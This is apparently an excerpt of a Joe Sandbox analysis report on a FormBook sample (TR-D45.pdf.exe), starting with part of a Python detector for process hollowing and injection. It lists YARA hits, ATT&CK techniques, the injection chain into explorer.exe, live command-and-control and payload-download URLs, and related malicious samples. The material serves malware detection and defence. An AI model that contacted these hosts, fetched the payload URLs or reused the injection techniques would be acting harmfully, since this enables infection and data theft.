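            findings["apc_injection"].append(f"{src} -> {ev['target']}")
        elif kind == "network_connect" and _basename(src) in SYSTEM_PROCESS_NAMES:
            findings["system_process_network"].append(f"{src} -> {ev['dst']}:{ev['port']}")
    # Hollowing: the same writer tore a section out of a remote process and mapped RWX memory into it.
    for writer, victim in sorted(unmapped & rwx_mapped):
        findings["process_hollowing"].append(f"{writer} hollowed {victim}")
    return dict(findings)


def score(findings: dict[str, list[str]]) -> int:
    return min(100, sum(WEIGHTS[rule] for rule in findings))


if __name__ == "__main__":
    result = analyze(EVENTS)
    for rule, evidence in result.items():
        print(f"[{WEIGHTS[rule]:>2}] {rule}: {'; '.join(evidence)}")
    print("score:", score(result))
```

      The hollowing rule deliberately needs both an unmap and an RWX map from the same writer into the same victim; either alone is common in legitimate loaders, and an RWX map into a process the writer also unmapped from is what distinguishes the control.exe case here from control.exe's own later "read write" map into explorer.exe, which is not counted.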

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match  File source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match  File source: Process Memory Space: control.exe PID: 6660, type: MEMORY
      Source: Yara match  File source: Process Memory Space: TR-D45.pdf.exe PID: 3668, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match  File source: 0000000C.00000002.495604488.00000000028E0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 0000000C.00000002.495505278.00000000028B0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.314014280.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 00000001.00000002.319831190.000000001E010000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match  File source: 0000000C.00000002.495031806.0000000002440000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Techniques with signature matches, by tactic. The bracketed digits reproduce the superscript hit-count markers the report attaches to each matched technique.

      Execution: Shared Modules [1]
      Privilege Escalation: Process Injection [512]
      Defense Evasion: Process Injection [512]; Masquerading [1]; Rootkit [1]; Virtualization/Sandbox Evasion [22]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [13]
      Credential Access: Credential API Hooking [1]
      Discovery: Security Software Discovery [721]; Virtualization/Sandbox Evasion [22]; Process Discovery [2]; Remote System Discovery [1]; System Information Discovery [31]
      Collection: Credential API Hooking [1]; Archive Collected Data [1]
      Command and Control: Encrypted Channel [12]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [3]
      Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact: no matched techniques

      Behavior Graph

      Behavior Graph ID: 321007  Sample: TR-D45.pdf.exe  Start date: 20/11/2020  Architecture: WINDOWS  Score: 100

      Sample-level DNS/IP: g.msn.com
      Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 9 other signatures

      TR-D45.pdf.exe (started)
        signatures: Contains functionality to detect hardware virtualization (CPUID execution measurement); Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; 3 other signatures
        -> TR-D45.pdf.exe (started, second instance)
             DNS/IP: pilatescollective.com 192.185.152.65, 443, 49718, UNIFIEDLAYER-AS-1US, United States
             signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
             -> explorer.exe (injected)
                  DNS/IP: gcvinternational.com 34.102.136.180, 49743, 80, GOOGLEUS, United States; www.celebrations.sucks 54.147.194.143, 49745, 80, AMAZON-AESUS, United States; 2 other IPs or domains
                  signatures: System process connects to network (likely due to code injection or exploit)
                  -> control.exe (started)
                       signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                       -> cmd.exe (started)
                            -> conhost.exe (started)


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      TR-D45.pdf.exe | 29% | Virustotal | 
      TR-D45.pdf.exe | 15% | ReversingLabs | Win32.Trojan.Bulz

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://www.founder.com.cn/cn/bThe | 0% | URL Reputation (×3) | safe
      http://cps.letsencrypt.org0 | 0% | URL Reputation (×3) | safe
      http://ocsp.int-x3.letsencrypt.org0/ | 0% | URL Reputation (×3) | safe
      http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB | 0% | Avira URL Cloud | safe
      http://www.tiro.com | 0% | URL Reputation (×3) | safe
      http://www.goodfont.co.kr | 0% | URL Reputation (×3) | safe
      http://www.carterandcone.coml | 0% | URL Reputation (×3) | safe
      http://www.sajatypeworks.com | 0% | URL Reputation (×3) | safe
      http://www.typography.netD | 0% | URL Reputation (×3) | safe
      http://www.founder.com.cn/cn/cThe | 0% | URL Reputation (×3) | safe
      http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation (×3) | safe
      http://fontfabrik.com | 0% | URL Reputation (×3) | safe
      http://www.founder.com.cn/cn | 0% | URL Reputation (×3) | safe
      http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation (×3) | safe
      http://www.galapagosdesign.com/DPlease | 0% | URL Reputation (×3) | safe
      http://www.sandoll.co.kr | 0% | URL Reputation (×3) | safe
      http://www.urwpp.deDPlease | 0% | URL Reputation (×3) | safe
      http://www.zhongyicts.com.cn | 0% | URL Reputation (×3) | safe
      http://www.sakkal.com | 0% | URL Reputation (×3) | safe
      http://www.gcvinternational.com/gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi | 0% | Avira URL Cloud | safe
      http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation (×3) | safe
      http://www.celebrations.sucks/gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      pilatescollective.com | 192.185.152.65 | true | false | none | high
      www.celebrations.sucks | 54.147.194.143 | true | true | none | unknown
      gcvinternational.com | 34.102.136.180 | true | true | none | unknown
      www.gcvinternational.com | unknown | unknown | true | none | unknown
      g.msn.com | unknown | unknown | false | none | high
      www.montreynaud.com | unknown | unknown | true | none | unknown

                  Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://www.gcvinternational.com/gnu/?bly=TVIpcz004Rkd&X2MxIjJP=i4YBL42YhvK+usDHzss6Tj24XYATFEIvS7y0nzG29ZgEeNh3uLyKqQDd2VWk30ZHQtTi | true | Avira URL Cloud: safe | unknown
      http://www.celebrations.sucks/gnu/?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB4PiPj5CXghE&bly=TVIpcz004Rkd | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.fontbureau.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.fontbureau.com/designersG | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.fontbureau.com/designers/? | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.founder.com.cn/cn/bThe | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://cps.letsencrypt.org0 | TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.fontbureau.com/designers? | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      https://pilatescollective.com/ | TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | false | none | high
      http://ocsp.int-x3.letsencrypt.org0/ | TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.celebrations.sucks/gnu?X2MxIjJP=cm/vZIiV3Os0q9m3wV9NAYnR84EpEK2W/qhCxJKWCVek11jnJ1A4MINfB | control.exe, 0000000C.00000002.497562201.0000000004E2F000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.tiro.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.fontbureau.com/designers | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin/ | TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp | false | none | high
      http://www.goodfont.co.kr | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.binl | TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | false | none | high
      https://pilatescollective.com/D4 | TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | false | none | high
      http://www.carterandcone.coml | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.sajatypeworks.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin=WyM | TR-D45.pdf.exe, 00000001.00000002.314208350.0000000000887000.00000004.00000020.sdmp | false | none | high
      http://www.typography.netD | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.founder.com.cn/cn/cThe | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://fontfabrik.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.founder.com.cn/cn | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.fontbureau.com/designers/frere-jones.html | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://cert.int-x3.letsencrypt.org/0 | TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | false | none | high
      http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin7 | TR-D45.pdf.exe, 00000001.00000003.270384590.00000000008C0000.00000004.00000001.sdmp | false | none | high
      http://www.galapagosdesign.com/DPlease | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.fontbureau.com/designers8 | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.fonts.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | none | high
      http://www.sandoll.co.kr | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      https://pilatescollective.com/myguy/Edog_WaRWObtLyf156.bin | TR-D45.pdf.exe | false | none | high
      http://www.urwpp.deDPlease | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.zhongyicts.com.cn | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://www.sakkal.com | explorer.exe, 00000005.00000000.299623008.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe (×3) | unknown
      http://cps.root-x1.letsencrypt.org0 | TR-D45.pdf.exe, 00000001.00000003.270393994.00000000008C5000.00000004.00000001.sdmp | false | URL Reputation: safe (×3) | unknown

                                                      Contacted IPs


                                                      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      54.147.194.143 | unknown | United States | 14618 | AMAZON-AESUS | true
      34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true
      192.185.152.65 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false

                                                      General Information

      Joe Sandbox Version: 31.0.0 Red Diamond
      Analysis ID: 321007
      Start date: 20.11.2020
      Start time: 09:03:43
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 9m 11s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: TR-D45.pdf.exe
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of new started processes analysed: 23
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 1
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal100.troj.spyw.evad.winEXE@7/0@8/3
                                                      EGA Information:Failed
                                                      HDC Information:
                                                      • Successful, ratio: 17.2% (good quality ratio 14.6%)
                                                      • Quality average: 68%
                                                      • Quality standard deviation: 34.3%
                                                      HCA Information:
                                                      • Successful, ratio: 94%
                                                      • Number of executed functions: 168
                                                      • Number of non-executed functions: 51
                                                      Cookbook Comments:
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found application associated with file extension: .exe
                                                      Warnings:
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 92.122.144.200, 51.11.168.160, 104.43.139.144, 52.155.217.156, 52.177.165.30, 20.54.26.129, 52.142.114.176, 95.101.22.134, 95.101.22.125
                                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, bn3p.wns.notify.windows.com.akadns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      No simulations

                                                      Joe Sandbox View / Context

                                                      IPs

                                                       Match  /  Associated Sample Name / URL (Detection)  /  Context
                                                       54.147.194.143
                                                         Order specs19.11.20.exe (malicious)
                                                           • www.chantix.sucks/nwrr/?Rxo=L6hH4NIhfjzT&cj=uGPGvmJ2JHt21s4rgOafVTq/y3pY7yC+ILF7bn+N5+KqJxZXLHbImlswjI/oLvcp6/oghs0J3A==
                                                         DHL No_SINI0068206497.exe (malicious)
                                                           • www.crash.sucks/mkr/
                                                         Remittance Scan DOC-2029293#PI207-048.exe (malicious)
                                                           • www.delonghi.sucks/svh9/?rPXTJx=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiU2wxntZNx4hJVMVg==&Lvyt=BZO03Fr
                                                         Payment Advice - Advice Ref[GLV824593835].exe (malicious)
                                                           • www.delonghi.sucks/svh9/?UN9hLV=EhL05l&9rQhv2=CJfJI9r1cBD0WydEqOpYnndytqZZCXXpDqaNH0BqxvDchJy8UsetUmnvuiY2jhruAdxu
                                                       34.102.136.180
                                                         86dXpRWnFG.exe (malicious)
                                                           • www.powderedsilk.com/ogg/?FdtP=yL0l42d8z4u&JfspOLvH=fOCM8bU6nldV/iwSncfaF5Bzy/lGPGgo/g5DGIZRlu3EMk3UROnm6TGL4YPAlMSLjacD
                                                         LIST OF PRODUCTS NEEDED.exe (malicious)
                                                           • www.present-motherhood.com/pna/?oXN=7nbLudZHS&wP9=pAJh36KDGKuozQ+wlnL4iaUZacIoIbb12I26NWSsGNXaprJ2jX+VR1VHCYeoOV3CYcpo
                                                         Order specs19.11.20.exe (malicious)
                                                           • www.overstockalpine.com/nwrr/?cj=Nc1MB4yErYgRagn/HzK3hScSsYEBegMtx+kEQv9TefYD7E7OGiE02SCDOI6eM3Hv09tUJ3eV9Q==&Rxo=L6hH4NIhfjzT
                                                         Okwt8fW5KH.exe (malicious)
                                                           • www.mybriefbox.com/sdk/?AP=KzrxE&kzut2Pv=ieC5SQ4WTCMGwLwKeHkkTkUTO60lnbNinIRTqFa5Tgq0ajZ12E69OSpNqOiQRcX/surf
                                                         Purchase Order 40,7045.exe (malicious)
                                                           • www.onlineshoppingisbest.com/igqu/?YnztXrjp=cAw+48JGWTFWiF+zD75YoKcSRGv0/cbX2CyjAL3BYh15xmcIYagPiXPUr4/0BC838prH&sBZxwb=FxlXFP2PHdiD2
                                                         Payment Advice - Advice Ref GLV823990339.exe (malicious)
                                                           • www.brilliance-automation.com/gyo3/?Ez=XAbIWkmCD7FprhBGM/1VWQtkWKjPoo+hixDnJGBEsGUo9CkrVpkcDmC1vi0ujf808Qfd1id09g==&lhud=TjfdU2S
                                                         Purchase Order 40,7045$.exe (malicious)
                                                           • www.rockinglifefromhome.com/igqu/?afo=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORGuicEzVgEw0Hp6jQ==&DHU4SX=gbT8543hIhm
                                                         MV.KMTC JEBEL ALI_pdf.exe (malicious)
                                                           • www.mereziboutique.com/y9z/?uFQl=hX/JgwGUf2blPgyiHp8pkr0UcN4JhiEs10p3+69z9DK69Gln3SJoRK9DZHZ4ze7gp3+f&CTvp=fv10_lYhrxJtW6
                                                         SWIFT_HSBC Bank.exe (malicious)
                                                           • www.homewellliving.com/nt8e/?7nwltvxh=y2sdQ9Xb5ECC4UyPumlTTMs33wxYtaLvB/dO1hyuc+aLkGir7cEA1isigJn19hEFQwDS&org=3foxnfCXOnIhKD
                                                         23692 ANRITSU PROBE po 29288.exe (malicious)
                                                           • www.funeralfermentarium.com/9d1o/?lvH8U=Wears+I1XvB+Lmut0rGzY9wAFTAHH41k5OVIheQSGxmq0oO+QWZXKPOXziEsAnWJSQrEFn+Exw==&E6A=8pDxC4
                                                         PO0119-1620 LQSB 0320 Siemens.exe (malicious)
                                                           • www.guillermoastiazaran.com/sppe/?DnadT=x+bcW4Gq4Sa+8Fw3ruRe02HfSBDGbo9y1yLk6wxIyT1lxw5Q+sxUrgb1tDfRR28VG68C&DxlLi=2dmX
                                                         KYC_DOC_.EXE (malicious)
                                                           • www.packorganically.com/bw82/?CXrL=77CCBBr2/49gWL5yauZnKqdCED7z+VtJXat/kGRZ6Qnjpe6WQ1Ax9xdsmUB8H+4disGx&llvxw=fTAlUHeHDVNhYV
                                                         PO0119-1620 LQSB 0320 Siemens.exe (malicious)
                                                           • www.bullwingsgt.com/sppe/?00D=NB3Dd/vOM6aQ3m0lcddBYOe/MXAC8Z/KQ2ZGmCsq6hDofgl0Po6pPua8TNWmH6LR2TRn&w48H=qBZ83x7XYlyP0lo0
                                                         ant.exe (malicious)
                                                           • www.spidermenroofsupport.com/94sb/?8pMt5xHX=C9biJKOafB1QzsexO7xJmKpRIYJMQj6VpKItH4wgGF+KF++s1hKyu2EaSVFJqiHWuFvG&GzrT=Wb1LdRq8x
                                                         PROOF OF PAYMENT.exe (malicious)
                                                           • www.prideaffiliate.com/mua8/?w48t=0pY022IXUBwLfpfP&nflpdH=Vm4JrPClk0aQj+jhcdONVb3zc5GtcUOmsZyrOc+k5NW+jXUcqcFsSwfT9cazrXQd7qcZ
                                                         DEBIT NOTE DB-1130.exe (malicious)
                                                           • www.knotgardenlifestylings.com/ihm3/?sBZ4lrK=PS39z8PEw7TzfNOCiLKd1OXoS8/GfzxzB5O+ulo0NmPTjwXimFWvt/sJkvH86VVEya1bUCOS1g==&FPcT7b=djCDfFRXOP7H
                                                         POSH XANADU Order-SP-20-V241e.xlsx (malicious)
                                                           • www.desk-freely.com/dtn/?lb=tWjSWtdhKEbcvZcDY2Isxp7DhwPqmKrgqV2LL8a+7y46vKpMTXTGiWVbDe2Qat9zzYwG/g==&8ptdvJ=KT0pXTAPFjE0
                                                         PI 11172020.xlsx (malicious)
                                                           • www.yourpassionpurposepower.com/egem/?Ob20Lf_=T+Py0QdJSh8uop0xQluPGRTKd40I+j4T0iQ6z9ArmxF3ClsH1rswXmlXU/F87B5u4zxcgw==&BB6=L48xY
                                                         SHIPMENT DOCUMENT.xlsx (malicious)
                                                           • www.jesussavethelost.com/tlu/?ebc8=E2JdjN_822M&Kpjp=WL9elnUNGmLALDc/aT9Yvopy5IOc6bZx+8KB1+n4COxRyIg81J8N2lucSrbi65xgujJdpg==
                                                         Payment copy.doc (malicious)
                                                           • www.bklynphotography.com/rtkc/?Lzut_=ltx8q4Ox&PBbXpL1=bE4nU21SxEXdYnFuZsah0rQhdxZ2NWbKsDNv4AQWUj+/+gwst6X3Stf0y64HfX7kmVIoow==

                                                      Domains

                                                       Match  /  Associated Sample Name / URL (Detection)  /  Context
                                                       pilatescollective.com
                                                         order.exe (malicious)
                                                           • 192.185.152.65

                                                      ASN

                                                       Match  /  Associated Sample Name / URL (Detection)  /  Context
                                                       GOOGLE (US)
                                                         knitted yarn documents.exe (malicious)
                                                           • 172.253.120.109
                                                         86dXpRWnFG.exe (malicious)
                                                           • 34.102.136.180
                                                         https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php (malicious)
                                                           • 172.217.16.130
                                                         b0408bca49c87f9e54bce76565bc6518.exe (malicious)
                                                           • 74.125.34.46
                                                         b2e3bd67d738988ca1bbed8d8b3e73fc.exe (malicious)
                                                           • 74.125.34.46
                                                         ad14f913dc65be569277c8c76de608a4.exe (malicious)
                                                           • 74.125.34.46
                                                         b2352353279664cc442f346015e86317.exe (malicious)
                                                           • 74.125.34.46
                                                         ab1671011f681ff09ac0ffd70fc4b92b.exe (malicious)
                                                           • 74.125.34.46
                                                         BetterPoints_v4.60.1_apkpure.com.apk (malicious)
                                                           • 216.58.212.163
                                                         b0e7416dbf03a7359e909c5bd68ae6e1.exe (malicious)
                                                           • 74.125.34.46
                                                         afaa3d5f10a2ea3c2813b3dd1dac8388.exe (malicious)
                                                           • 74.125.34.46
                                                         afbce292dbb11bda3b89b5ff8270bd20.exe (malicious)
                                                           • 74.125.34.46
                                                         aea80fb9d13561d7628b9d2f80a36ad0.exe (malicious)
                                                           • 74.125.34.46
                                                         af8eb3450867384ca855f2f0d0d6ae94.exe (malicious)
                                                           • 74.125.34.46
                                                         ae80b9b86323a612ce7a9c99f5cb65b4.exe (malicious)
                                                           • 74.125.34.46
                                                         ae85c1f45fb26bf61dc41c2a93d29b76.exe (malicious)
                                                           • 74.125.34.46
                                                         adf21651776b58545870cdcb1b2d955b.exe (malicious)
                                                           • 74.125.34.46
                                                         b2592f2f7a2eb53687b3a26249513d6e.exe (malicious)
                                                           • 74.125.34.46
                                                         ad167b5f4bd63100aeb68d12a0d87fae.exe (malicious)
                                                           • 74.125.34.46
                                                         aae68603d6527b50b950e95f13e20e08.exe (malicious)
                                                           • 74.125.34.46
                                                       UNIFIEDLAYER-AS-1 (US)
                                                         Shipping Documents (INV,PL,BL)_pdf.exe (malicious)
                                                           • 192.185.170.106
                                                         Information-822908953.doc (malicious)
                                                           • 192.232.229.53
                                                         https://filmconsultancy.bindwall.ml/mike@filmconsultancy.com (malicious)
                                                           • 162.241.67.201
                                                         https://trondiamond.co/OMMOM/OM9u8 (malicious)
                                                           • 162.241.67.195
                                                         https://app.box.com/s/gdf36roak3w2fc52cgfbxuq651p0zehy (malicious)
                                                           • 162.241.87.44
                                                         ef5ai1p.dll (malicious)
                                                           • 192.232.229.53
                                                         http://septterror.tripod.com/the911basics.html (malicious)
                                                           • 192.254.236.192
                                                         Documentation.478396766.doc (malicious)
                                                           • 192.232.229.53
                                                         order.exe (malicious)
                                                           • 192.185.152.65
                                                         Documentation.478396766.doc (malicious)
                                                           • 162.241.44.26
                                                         8OP0MEmSDd.dll (malicious)
                                                           • 192.232.229.53
                                                         Information-478224510.doc (malicious)
                                                           • 192.232.229.53
                                                         ZcmAPc4xeE.dll (malicious)
                                                           • 162.241.44.26
                                                         7aKeSIV5Cu.dll (malicious)
                                                           • 192.232.229.53
                                                         qRMGCk1u96.dll (malicious)
                                                           • 192.232.229.53
                                                         qAm7u8G4lM.exe (malicious)
                                                           • 192.185.138.193
                                                         AWB# 9284730932.exe (malicious)
                                                           • 192.185.170.106
                                                         Document3327.xlsb (malicious)
                                                           • 198.57.244.39
                                                         POSH XANADU Order-SP-20093000-xlxs.xlsx (malicious)
                                                           • 192.185.144.204
                                                         dVcML4Zl0J.dll (malicious)
                                                           • 192.232.229.53
                                                       AMAZON-AES (US)
                                                         knitted yarn documents.exe (malicious)
                                                           • 23.21.126.66
                                                         BUILDING ORDER_PROPERTY SPECS.exe (malicious)
                                                           • 54.235.182.194
                                                         86dXpRWnFG.exe (malicious)
                                                           • 52.0.217.44
                                                         ano.exe (malicious)
                                                           • 23.21.42.25
                                                         kiiDjfpu2x.exe (malicious)
                                                           • 54.225.169.28
                                                         s5Hgh2z9mq.exe (malicious)
                                                           • 174.129.214.20
                                                         0hgHwEkIWY.exe (malicious)
                                                           • 54.225.169.28
                                                         CdmgSj4BO8.exe (malicious)
                                                           • 54.225.169.28
                                                         7PTbHgCUy6.exe (malicious)
                                                           • 54.225.169.28
                                                         DjP9Ogzsz8.exe (malicious)
                                                           • 54.225.169.28
                                                         rURZ9qp1cE.exe (malicious)
                                                           • 23.21.126.66
                                                         kaeHibiTa3.exe (malicious)
                                                           • 23.21.252.4
                                                         NYm3MN6z8D.exe (malicious)
                                                           • 23.21.126.66
                                                         sX1UqYq8cS.exe (malicious)
                                                           • 23.21.252.4
                                                         noaVP0hNm2.exe (malicious)
                                                           • 23.21.126.66
                                                         Swift Copy.exe (malicious)
                                                           • 23.21.252.4
                                                         https://smartdevappoffic.azurewebsites.net/qeBM8A4A6/WuZ2Y/FAjZdg5Nrw/@t1~RGCy/wefxc.php?bbre=d6266420d5a57cc3d73bcb5a9ec80cde (malicious)
                                                           • 52.200.37.44
                                                         bossson2.exe (malicious)
                                                           • 54.225.153.147
                                                         https://t.e.vailresorts.com/r/?id=h1bac782d,59eb410,55e61f1&VRI_v73=96008558&cmpid=EML_OPENDAYS_RESO_000_OK_SR_REN1Y_000000_TG0001_20201118_V00_EX001_LOCA_ANN_00000_000 (malicious)
                                                           • 100.25.209.179
                                                         REQUEST FOR QUOTATION-6container.exe (malicious)
                                                           • 54.243.161.145

                                                      JA3 Fingerprints

                                                       Match  /  Associated Sample Name / URL (Detection)  /  Context
                                                       37f463bf4616ecd445d4a1937da06e19
                                                         Shipping Documents (INV,PL,BL)_pdf.exe (malicious)
                                                           • 192.185.152.65
                                                         https://kimiyasanattools.com/outlook/latest-onedrive/microsoft.php (malicious)
                                                           • 192.185.152.65
                                                         https://filmconsultancy.bindwall.ml/mike@filmconsultancy.com (malicious)
                                                           • 192.185.152.65
                                                         https://trondiamond.co/OMMOM/OM9u8 (malicious)
                                                           • 192.185.152.65
                                                         https://www.canva.com/design/DAEN9RlD8Vk/acBvt6UoL-DafjXmQk38pA/view?utm_content=DAEN9RlD8Vk&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelink (malicious)
